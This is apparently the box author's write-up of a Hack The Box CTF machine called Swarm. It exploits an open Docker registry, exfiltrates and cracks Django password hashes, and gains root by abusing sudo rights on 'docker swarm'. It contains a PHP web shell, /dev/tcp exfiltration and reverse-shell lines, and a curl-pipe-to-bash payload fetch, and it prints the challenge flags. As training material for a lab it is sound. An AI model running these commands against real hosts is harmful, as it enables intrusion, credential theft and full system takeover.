HTB Business CTF - Swarm Writeup

May 21, 2024
Writeup for my 2024 HTB Business CTF FullPwn Box Swarm.

This is a writeup for my 2024 Hack The Box Business CTF FullPwn Machine, Swarm. While I was not initially planning on creating a dedicated writeup for the machine, it was brought to my attention that many players regarded the privilege escalation as ungodly. As such, I felt a responsibility to provide the traumatised players with a thorough explanation of my creation.

[Image: confession]

Enumeration

As always, we start off with an nmap scan to test the waters.

ports=$(nmap -p- --min-rate=1000 -T4 10.129.230.94 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.129.230.94

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 17:21 BST
Nmap scan report for swarm.htb (10.129.230.94)
Host is up (0.016s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp   open  http       nginx 1.25.5
|_http-server-header: nginx/1.25.5
|_http-title: Home - Simple News Portal
5000/tcp open  http       Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
7946/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 92.82 seconds

We see that SSH is at our disposal, as well as an NGINX web server and a Docker registry on port 5000. Port 7946 also stands out: Docker uses it for communication among swarm nodes, a first hint at the box's theme.

Port 80

Browsing to the website on port 80, we get redirected to swarm.htb, which we add to our hosts file:

echo "10.129.230.94 swarm.htb" | sudo tee -a /etc/hosts

We land on a news page hosting several articles related to events from the CTF lore. The site has a Login mechanism but no means to register an account.

[Image: the news web application]

We run a directory scan to look for potentially interesting endpoints.

gobuster dir -u http://swarm.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -q

/login                (Status: 200) [Size: 5673]
/profile              (Status: 302) [Size: 0] [--> /login?next=/profile]
/admin                (Status: 301) [Size: 0] [--> /admin/]
/posts                (Status: 302) [Size: 0] [--> /login?next=/posts]
/logout               (Status: 302) [Size: 0] [--> /]

Browsing to /admin reveals that we are dealing with a Django backend.

[Image: Django admin login]

At this point, we have hit a wall, as there’s no more functionality to investigate on the web application, and we lack any credentials for the admin panel. We therefore move on to the exposed Docker registry.

Foothold

We can use the registry API to query for images hosted on the service, as long as it is not password-protected.

curl http://swarm.htb:5000/v2/_catalog

{"repositories":["newsbox-web"]}

curl http://swarm.htb:5000/v2/newsbox-web/tags/list

{"name":"newsbox-web","tags":["latest"]}

We see an image (repository) named newsbox-web:latest, which matches the name of the web application we checked out earlier. We proceed to pull the image to create a container locally, so that we can take a look at the backend.

docker pull 10.129.230.94:5000/newsbox-web:latest    

Error response from daemon: Get "https://10.129.230.94:5000/v2/": http: server gave HTTP response to HTTPS client

We get an error, as the Docker client defaults to HTTPS for registry communication, which fails here because the registry is not set up for it. To fix this, we need to add the server to our insecure-registries, allowing Docker to talk to it over plain HTTP instead of requiring a valid TLS certificate.

Note: An alternative approach that might be preferable for some players is a tool such as DockerRegistryGrabber, which can pull images and re-create their filesystems locally without creating a Docker container. This is particularly useful for players whose machines have a different architecture from the target's, who would otherwise struggle to run the image locally.
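If we prefer to avoid the Docker daemon entirely, the registry's HTTP API can also be driven by hand with curl. A minimal sketch (the sha256 digest is a placeholder; real digests come from the manifest response):

# Fetch the image manifest, which lists the layer digests
curl -s http://swarm.htb:5000/v2/newsbox-web/manifests/latest

# Download a layer blob and unpack it (each layer is a gzipped tar of filesystem changes)
curl -s http://swarm.htb:5000/v2/newsbox-web/blobs/sha256:<digest> -o layer.tar.gz
tar -xzf layer.tar.gz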

echo '{ "insecure-registries":["10.129.230.94:5000"] }' | sudo tee /etc/docker/daemon.json

{ "insecure-registries":["10.129.230.94:5000"] }

Note that we write the file rather than appending to it: appending a second JSON object to an existing daemon.json would produce invalid JSON, so if the file already contains settings, merge the key in manually instead.

We then have to restart the docker service for our changes to take effect, after which we retry pulling the image.

sudo systemctl restart docker
docker pull 10.129.230.94:5000/newsbox-web:latest    

latest: Pulling from newsbox-web
b0a0cf830b12: Pull complete 
72914424168c: Pull complete 
545ebfaa7506: Pull complete 
80ee918b2084: Pull complete 
d361726ad66f: Pull complete 
4d2c6c1a8e80: Pull complete 
df4459b8a74f: Pull complete 
26484ab3509b: Pull complete 
Digest: sha256:26e727643185bfcf51da5fe8003f76d3b43ee1e51762fb44f0fae1c01679baed
Status: Downloaded newer image for 10.129.230.94:5000/newsbox-web:latest
10.129.230.94:5000/newsbox-web:latest

Now, we can create a container with the image.

# Verify we have the image
docker image ls -a                               

REPOSITORY                       TAG       IMAGE ID       CREATED        SIZE
10.129.230.94:5000/newsbox-web   latest    10411032f71d   25 hours ago   198MB

# Create the container using the Image ID
docker container create 10411032f71d

# Verify the creation
docker ps -a
CONTAINER ID   IMAGE          COMMAND       CREATED          STATUS    NAMES
0efa04a66079   10411032f71d   "python..."   23 seconds ago   Created   peaceful_ganguly

# Start container using the name
docker start peaceful_ganguly
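As an aside, docker run can collapse the create/start/exec steps into a single command; a sketch, assuming we only want a throwaway container:

docker run --rm -it 10.129.230.94:5000/newsbox-web:latest bash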

Finally, we can hop into a shell inside the container.

docker exec -it peaceful_ganguly bash

We find ourselves in the /app directory, which matches our expectation of a Django application.

root@0efa04a66079:/app# ls -al

total 300
drwxr-xr-x  1 root root   4096 Apr 25 13:09 .
drwxr-xr-x  1 root root   4096 Apr 26 15:36 ..
-rw-r--r--  1 root root    180 Apr 25 13:08 Dockerfile
-rw-r--r--  1 root root 253952 Apr 25 12:59 db.sqlite3
drwxr-xr-x  1 root root   4096 Apr 25 14:46 django_news
-rw-r--r--  1 root root    689 Apr  6  2022 manage.py
drwxr-xr-x  4 root root   4096 Apr 24 16:57 media
drwxr-xr-x  1 root root   4096 Apr 25 12:05 newsApp
-rw-r--r--  1 root root     32 Apr 25 13:08 requirements.txt
drwxr-xr-x 11 root root   4096 Apr 25 14:49 static
-rw-r--r--  1 root root   1956 Apr 25 12:16 wget-log

We see a db.sqlite3 file, which we exfiltrate and enumerate for possible password hashes.

# Locally
nc -nlvp 4444 > db.sqlite3   
listening on [any] 4444 ...
# In Docker
root@0efa04a66079:/app# cat < db.sqlite3 > /dev/tcp/10.10.14.40/4444
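Since nc offers no integrity guarantees, it is worth comparing checksums on both ends before digging into the database:

# Run on both machines and compare the output
md5sum db.sqlite3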

We get three hashes:

sqlite> select * from auth_user;

1|pbkdf2_sha256$60$9jLMaflzyx1C3dAsBqZs8m$1H64ybyNv6NWUIw+TIaYE40VIW9enXe88teW5X+cQEI=|2024-04-30 16:32:56.994788|1|admin|Administrator|admin@swarm.htb|1|1|2022-04-06 01:44:10|Melo
2|pbkdf2_sha256$60$HXF8aUc1IWkR9ajH3y8LS8$d7MFlG+lVPC03n31bt4u6OvGs7z1hJpiUYp5eGHoAZM=|2022-04-06 08:16:01|0|ChasingDeadlines|Loman|cloman@swarm.htb|0|1|2022-04-06 08:14:40|Chase
3|pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=||0|PenniesForThoughts|Lessing|plessing@swarm.htb|1|1|2024-04-25 12:07:58|Penny

We save the hashes to a file and feed them to hashcat, using mode 10000 for Django's PBKDF2-SHA256 hashes.
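Extracting just the hash column is a one-liner, assuming the sqlite3 CLI is installed locally:

sqlite3 db.sqlite3 'SELECT password FROM auth_user;' > hash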

Note: The second field of each hash gives away that only 60 iterations were used, which of course is a non-default setting applied to make cracking less expensive for the sake of exploitation. PBKDF2 is generally quite secure, and Django (4.2) uses 600,000 iterations by default, a number which increases with each release.

hashcat -m 10000 hash /usr/share/wordlists/rockyou.txt

<...SNIP....>
pbkdf2_sha256$60$6oJcB6Vhj9eECUQS5VgZME$Ha25+TiE5JozOAyUEeN0VTKN27/aNXeWuAp95JXUYFg=:pennypenny99

After about thirty seconds, we obtain the password pennypenny99 for Penny Lessing's account. Her email address reveals the username to use, so we try to SSH into the machine as plessing.
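As an optional sanity check, we can recompute the digest ourselves using only Python's standard library; if the password is correct, this should print the base64 blob stored in the database:

python3 -c 'import base64, hashlib; print(base64.b64encode(hashlib.pbkdf2_hmac("sha256", b"pennypenny99", b"6oJcB6Vhj9eECUQS5VgZME", 60)).decode())'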

ssh plessing@swarm.htb

This is where we find the user.txt flag.

plessing@swarm$ cat user.txt

HTB{b3_f1r5t_b3_5m4rt3r_0r_ch34t}

Privilege Escalation

Alas, we reach the apparently traumatising part of the box, which is the privilege escalation, and also the vector that gives the box its name.

We start by checking the user’s sudo permissions.

plessing@swarm:~$ sudo -l

Matching Defaults entries for plessing on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User plessing may run the following commands on localhost:
    (root : root) /usr/bin/docker swarm *

We see that we can run the docker swarm command as root.

Swarm is a feature for creating and managing a cluster of Docker daemons distributed across multiple systems. A swarm consists of Manager and Worker nodes, with the former having the power to control and orchestrate the cluster.

These clusters work on the basis of so-called services, which are tasks that are executed on the nodes within the swarm. When creating a service, we can specify a container image and the commands that ought to be executed inside the running containers. A service can be replicated and therefore distributed to multiple nodes in the swarm, which is the key to escalating privileges in this scenario.
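To make this concrete, here is what a vanilla, non-malicious service looks like; the swarm schedules three nginx tasks across whichever nodes are available:

docker service create --name web --replicas 3 -p 8080:80 nginx:latest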

The path to exploit this configuration is quite intuitive: we will create a swarm that will contain both the target machine and our attacking machine, and will deploy a malicious container/service that will, by design, be deployed on the target, leading to privilege escalation.

Setting up the Swarm

We start by initialising the swarm on the target. Alternatively, we could also start a swarm on our attacking machine and join it from the target.

plessing@swarm:~$ sudo docker swarm init

Swarm initialized: current node (mt1rdeokdo2ubw7i12758f072) is now a manager.

To add a worker to this swarm, run the following command:

    docker swarm join --token SWMTKN-1-66a7eag29hbj3hyazvw62mqvhydv62t5r6cujjkjzha806f8kw-2ylbobpjug7bbpx7g4hl07aij 10.129.230.94:2377

To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.

The swarm is initialised, and the target machine automatically joins it as a manager. The output also provides a command that would allow another node to join the swarm; however, it would be joining as a worker.

For our purposes, we need a manager token, which we can generate as follows:

plessing@swarm:~$ sudo docker swarm join-token manager

To add a manager to this swarm, run the following command:

    docker swarm join --token SWMTKN-1-4lgn49qnlg2em8i8kiow50f9x1qt0rh0ru453kbs2xcvv9b9ym-2sa3ni9uj490oioypa72nnyof 10.129.230.94:2377

We can then paste this command on our attacking machine, joining the target’s swarm as a manager.

docker swarm join --token SWMTKN-1-4lgn49qnlg2em8i8kiow50f9x1qt0rh0ru453kbs2xcvv9b9ym-2sa3ni9uj490oioypa72nnyof 10.129.230.94:2377

This node joined a swarm as a manager.

If we run docker info, we can see that the swarm is active and has two nodes: ourselves and the target machine.

docker info

<...SNIP...>
 Swarm: active
  NodeID: arn38feajj60n3ay1zzxmoj11
  Is Manager: true
  ClusterID: r3tj78x77mr29p3cvk7wzdnde
  Managers: 2
  Nodes: 2
<...SNIP...>
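We can also list the swarm's members explicitly:

docker node ls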

Having appointed ourselves to the manager position, we can now abuse our power and impose services on the unfortunate nodes within our swarm.

There are different approaches we could take at this stage, such as using a pre-built OpenSSH image, but for the sake of this writeup I will manually create an image hosting a PHP web shell:

mkdir pwnpod
cd pwnpod

cat > Dockerfile <<EOF
FROM php:latest
WORKDIR /var/www/html
COPY index.php .
CMD ["php", "-S", "0.0.0.0:1337"]
EOF

cat > index.php <<EOF           
<?php system(\$_GET[0])?>
EOF

docker image build . -t pwnpod:latest

After building the image, we have to push it to the target’s registry:

docker image tag pwnpod:latest 10.129.230.94:5000/pwnpod:latest
docker push 10.129.230.94:5000/pwnpod:latest

Finally, we create the service and push it to the swarm, infecting all nodes. We expose the service on port 1337, and specify a mount, namely the root filesystem /, which will be mounted on /mnt within the container.

docker service create -d -p 1337:1337 --name pwnpod --replicas 2 --mount type=bind,source=/,target=/mnt localhost:5000/pwnpod:latest  

image localhost:5000/pwnpod:latest could not be accessed on a registry to record
its digest. Each node will access localhost:5000/pwnpod:latest independently,
possibly leading to different nodes running different
versions of the image.

Two things are crucial here. Firstly, while one might be tempted to specify the remote registry explicitly, i.e. 10.129.230.94:5000, this will cause you to pwn yourself: the image then resolves on your own node, so a task runs there as well, and although the service is reachable via 10.129.230.94:1337 through the swarm's routing mesh, it is your own filesystem that gets mounted instead of the target's. As such, we must define the registry as localhost:5000, which will fail to resolve on our system but succeed on the target, which actually runs a registry on that port. Secondly, note the --replicas 2. With more members in the swarm, we could either make this a global service or increase the replicas, to affect more nodes in the swarm.
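For reference, the global variant of the same command (a sketch; unnecessary with only two nodes) would be:

docker service create -d --name pwnpod --mode global --mount type=bind,source=/,target=/mnt -p 1337:1337 localhost:5000/pwnpod:latest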

We can now see the malicious containers running, but only on the target system (swarm). On our own node (htb-...), the tasks are rejected with a No such image: error, as Docker tried to pull the image from localhost:5000, which does not exist on our system.

docker service ps pwnpod

ID             NAME           IMAGE                          NODE             DESIRED STATE   CURRENT STATE             ERROR                              PORTS
wavip6eyx4bp   pwnpod.1       localhost:5000/pwnpod:latest   swarm            Ready           Ready 3 seconds ago                                          
tqk01tcrenl0    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 9 seconds ago    "No such image: localhost:5000…"   
xy2nf4qodxoq    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 14 seconds ago   "No such image: localhost:5000…"   
kj8xox16lqt0    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 19 seconds ago   "No such image: localhost:5000…"   
80k8q23aofv4    \_ pwnpod.1   localhost:5000/pwnpod:latest   htb-rudmqnwpkl   Shutdown        Rejected 24 seconds ago   "No such image: localhost:5000…"   
kmjrvnmid1ff   pwnpod.2       localhost:5000/pwnpod:latest   swarm            Running         Running 17 seconds ago

Checking the open ports on the target reveals that 1337 is listening, as we defined.

plessing@swarm:~$ ss -tlpn

State     Recv-Q    Send-Q       Local Address:Port        Peer Address:Port    Process
LISTEN    0         4096               0.0.0.0:5000             0.0.0.0:*
LISTEN    0         4096               0.0.0.0:80               0.0.0.0:*
LISTEN    0         128                0.0.0.0:22               0.0.0.0:*
LISTEN    0         4096                  [::]:5000                [::]:*
LISTEN    0         4096                     *:2377                   *:*
LISTEN    0         4096                     *:7946                   *:*
LISTEN    0         4096                  [::]:80                  [::]:*
LISTEN    0         128                   [::]:22                  [::]:*
LISTEN    0         4096                     *:1337                   *:*

Finally, we can use this exposed port to access our malicious PHP server and get a shell inside the container, with the target’s filesystem mounted.

curl http://swarm.htb:1337/index.php?0=id

uid=0(root) gid=0(root) groups=0(root)

Shell incoming:

# Terminal 1: start a listener
nc -nlvp 4444

# Terminal 2: host a reverse-shell payload
cat > boom.sh <<EOF
#!/bin/sh
/bin/sh -i >& /dev/tcp/10.10.14.59/4444 0>&1
EOF
python3 -m http.server 80

# Terminal 3: trigger download and execution through the web shell
curl 'http://10.129.230.94:1337/index.php?0=curl+10.10.14.59/boom.sh|bash'

Back in the first terminal, the listener catches the shell:

listening on [any] 4444 ...
connect to [10.10.14.59] from (UNKNOWN) [172.18.0.8] 38604
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

We get a shell as root inside the container, with the host filesystem mounted at /mnt.
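One convenient option at this point is to chroot into the mount, which effectively turns this into a root shell over the host's files (process and network namespaces still belong to the container):

# chroot /mnt /bin/bash

For our purposes, simply browsing the mount is enough.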

# cd /mnt
# ls -al root 
total 56
drwx------  6 root root  4096 Apr 30 16:31 .
drwxr-xr-x 18 root root  4096 Apr 17 08:46 ..
lrwxrwxrwx  1 root root     9 Apr 25 14:58 .bash_history -> /dev/null
-rw-r--r--  1 root root   571 Apr 10  2021 .bashrc
drwxr-xr-x  3 root root  4096 Apr 24 16:55 .cache
drwx------  3 root root  4096 Apr 25 13:09 .docker
-rw-r--r--  1 root root   161 Jul  9  2019 .profile
drwxr-xr-x  2 root root  4096 Apr 25 11:57 .vim
-rw-------  1 root root 18003 Apr 30 16:31 .viminfo
drwxr-xr-x  4 root root  4096 Apr 25 14:44 docker
-rw-r-----  1 root root    33 Apr 25 14:58 root.txt

At last, we obtain the dreaded final flag:

# cat root/root.txt
HTB{5tunG_bY_th3_5w4rm}

Alternative Privesc Methods

Alternative methods of exploitation include creating a swarm on our attacking machine, as opposed to initialising it on the target, and joining it from the target system as a worker. One can then also deploy malicious images, either by forwarding a local registry or using the one on the target.
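Forwarding a local registry, for instance, is a one-liner with SSH remote port forwarding (a sketch; port 5555 is arbitrary, since 5000 is already taken on the target):

ssh -R 5555:127.0.0.1:5000 plessing@swarm.htb

The target's Docker daemon could then pull our images via localhost:5555.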

The steps are similar; we first initialise a swarm on our attacking machine:

docker swarm init --advertise-addr 10.10.14.12

Swarm initialized: current node (wrcs67aevd8b91apm7gk0d0jq) is now a manager.

To add a worker to this swarm, run the following command:

    docker swarm join --token SWMTKN-1-5s1avojblmwgma55ie1bssf9ssye0h2erbuosqppj2ihqr3779-4p7iiqqlwrg6ef76m59uxh2ov 10.10.14.12:2377

To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.

We then run the provided command on the target machine to join our swarm as a worker.

plessing@swarm:~$ sudo docker swarm join --token SWMTKN-1-5s1avojblmwgma55ie1bssf9ssye0h2erbuosqppj2ihqr3779-4p7iiqqlwrg6ef76m59uxh2ov 10.10.14.12:2377

This node joined a swarm as a worker.

Back on our attacking machine, we can list the nodes in the swarm:

docker node ls

ID                            HOSTNAME         STATUS    AVAILABILITY   MANAGER STATUS   ENGINE VERSION
wrcs67aevd8b91apm7gk0d0jq *   htb-rudmqnwpkl   Ready     Active         Leader           25.0.3
r79o0kqhcwktmljza2s2d7rto     swarm            Ready     Active                          26.1.1

I'll also demonstrate the OpenSSH alternative here, as opposed to our PHP web shell. Once again, this benefits players on architectures different from the target's, who would otherwise be unable to build a compatible image locally and push it to the target.

docker pull lscr.io/linuxserver/openssh-server:amd64-latest

amd64-latest: Pulling from linuxserver/openssh-server
6c0d85d774e7: Pull complete 
1c50a76b3d41: Pull complete 
d48dba489a7d: Pull complete 
069593985fd7: Pull complete 
5dc7ed07e470: Pull complete 
e815c350f682: Pull complete 
46b882b84dc4: Pull complete 
Digest: sha256:bd738dd7a7012fe38f2f6829a8511cd980c05f1ed511390e38b14c3164518445
Status: Downloaded newer image for lscr.io/linuxserver/openssh-server:amd64-latest
lscr.io/linuxserver/openssh-server:amd64-latest

Again, we tag and push it to the target’s registry:

docker image tag lscr.io/linuxserver/openssh-server:amd64-latest swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest
docker push swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest

The push refers to repository [swarm.htb:5000/lscr.io/linuxserver/openssh-server]
3348306d1b8b: Pushed 
d296c9cd4a28: Pushed 
d58325308e45: Pushed 
98051686a067: Pushed 
cd7df000bc55: Pushed 
c2b4ff0f7a07: Pushed 
67230d759fa0: Pushed 
amd64-latest: digest: sha256:bd738dd7a7012fe38f2f6829a8511cd980c05f1ed511390e38b14c3164518445 size: 1782

Finally, we create the service, same as before. To make the attack a little more sophisticated, I will show how to precisely target a given node in the swarm.

Targeting Nodes

We can add arbitrary metadata to a node using labels, which we can in turn use to specify constraints on where a service may be deployed.

docker node update --label-add target=1 swarm 

swarm

Here, we simply add a target label to the node. This could, of course, be done much more covertly. We can see the label when inspecting the node:

docker node inspect swarm --pretty

ID:			r79o0kqhcwktmljza2s2d7rto
Labels:
 - target=1
Hostname:              	swarm
Joined at:             	2024-05-22 07:54:02.461147339 +0000 utc
Status:
 State:			Ready
 Availability:         	Active
 Address:		10.129.242.34
Platform:
 Operating System:	linux
 Architecture:		x86_64
Resources:
 CPUs:			2
 Memory:		3.793GiB
Plugins:
 Log:		awslogs, fluentd, gcplogs, gelf, journald, json-file, local, splunk, syslog
 Network:		bridge, host, ipvlan, macvlan, null, overlay
 Volume:		local
Engine Version:		26.1.1
TLS Info:
 TrustRoot:
-----BEGIN CERTIFICATE-----
MIIBazCCARCgAwIBAgIUI5xC/uLTYChqRqmzs+ON/itvgcgwCgYIKoZIzj0EAwIw
EzERMA8GA1UEAxMIc3dhcm0tY2EwHhcNMjQwNTIyMDc0ODAwWhcNNDQwNTE3MDc0
ODAwWjATMREwDwYDVQQDEwhzd2FybS1jYTBZMBMGByqGSM49AgEGCCqGSM49AwEH
A0IABDjHVwilDdZ7fa1t21gpM8Ea5JjbznBudoELzDGsvNsvQMMTT1rNNPLZuvGp
kJYS0ZI8QfTAVYjBgf8LLZpGEV6jQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMB
Af8EBTADAQH/MB0GA1UdDgQWBBQNudO66JJXeWysH9sEEZSsPonYWjAKBggqhkjO
PQQDAgNJADBGAiEAnQWQDJ4mWHFfMK2gwynoW7xYyxAmolRtgVEB6Q2dG4kCIQCk
tt6QBfKr6GUZ9qF2DLw927ract6FcFQ7bL1QsrE2wg==
-----END CERTIFICATE-----

 Issuer Subject:	MBMxETAPBgNVBAMTCHN3YXJtLWNh
 Issuer Public Key:	MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEOMdXCKUN1nt9rW3bWCkzwRrkmNvOcG52gQvMMay82y9AwxNPWs008tm68amQlhLRkjxB9MBViMGB/wstmkYRXg==

Now, we create the service, targeting only nodes in possession of this target label.

docker service create --name pwnpod2 \
--mode global \
--constraint node.labels.target==1 \
--mount type=bind,source=/,target=/mnt \
-e SUDO_ACCESS=true \
-e USER_NAME=melo \
-e USER_PASSWORD=melo \
-e PASSWORD_ACCESS=true \
-p 2222:2222 \
swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest

overall progress: 1 out of 1 tasks 
r79o0kqhcwkt: running   
verify: Service converged

And to verify:

docker service ps pwnpod2

ID             NAME                                IMAGE                                                            NODE      DESIRED STATE   CURRENT STATE            ERROR     PORTS
jdq7ufwk0gbr   pwnpod2.r79o0kqhcwktmljza2s2d7rto   swarm.htb:5000/lscr.io/linuxserver/openssh-server:amd64-latest   swarm     Running         Running 10 seconds ago

We see that the service was started on the target machine, and port 2222 is now open:

plessing@swarm:~$ ss -tlpn

State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port  Process  
LISTEN   0        4096             0.0.0.0:5000          0.0.0.0:*              
LISTEN   0        4096             0.0.0.0:80            0.0.0.0:*              
LISTEN   0        128              0.0.0.0:22            0.0.0.0:*              
LISTEN   0        4096                [::]:5000             [::]:*              
LISTEN   0        4096                   *:7946                *:*              
LISTEN   0        4096                   *:2222                *:*              
LISTEN   0        4096                [::]:80               [::]:*              
LISTEN   0        128                 [::]:22               [::]:*  

We can now ssh into the target on port 2222 as the melo user:

ssh melo@swarm.htb -p 2222

The authenticity of host '[swarm.htb]:2222 ([10.129.242.34]:2222)' can't be established.
ECDSA key fingerprint is SHA256:BU1EzGvQydNBj02VL/Rz70W3+kbAkm+CvwNt17Tllhw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[swarm.htb]:2222,[10.129.242.34]:2222' (ECDSA) to the list of known hosts.
melo@swarm.htb's password: melo
Welcome to OpenSSH Server
74de20dd9357:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

For security reasons, the password you type will not be visible.

[sudo] password for melo: melo
/config # 

The filesystem is mounted in /mnt, giving us full access:

/config # cat /mnt/root/root.txt 
HTB{5tunG_bY_th3_5w4rm}

This method is much more targeted, which, depending on the situation, might be preferable.
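Once we are done, the artefacts are easy to clean up from the manager node:

# On the attacking machine (the manager)
docker service rm pwnpod2
docker node update --label-rm target swarm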

Closing Thoughts

While building this box I found a lot of interesting vectors when it comes to Docker Swarm, and I am eager to showcase a few of them in future machines. One quirk of this specific vector was particularly interesting to me: if you are not careful, you can pwn yourself, which is exactly what happened when I was initially testing my creation.

When running the service-creation command of the initial method, shown below, specifying the remote registry via its external IP address or domain name makes the image resolvable on my own node too, so a task gets scheduled there; the service is still reachable via the target's IP through the routing mesh, but it is my own root filesystem that ends up mounted in /mnt.

docker service create -d -p 1337:1337 --name pwnpod --replicas 2 --mount type=bind,source=/,target=/mnt swarm.htb:5000/pwnpod:latest

This is avoided only by specifying localhost:5000, or by adding a --constraint flag to pinpoint the target machine(s).
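The built-in node attributes also work as constraints, so pinning by hostname (a sketch reusing the first method's image) avoids the label dance entirely:

docker service create -d --name pwnpod --constraint node.hostname==swarm --mount type=bind,source=/,target=/mnt -p 1337:1337 localhost:5000/pwnpod:latest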

Finally, I was quite surprised by the reactions I saw on the Discord server; I must say, a small part of me takes pride in having created a puzzle that stirred up such a swarm of emotions…

I hope you still found joy in beating this challenge and that the path to root was rewarding in the end!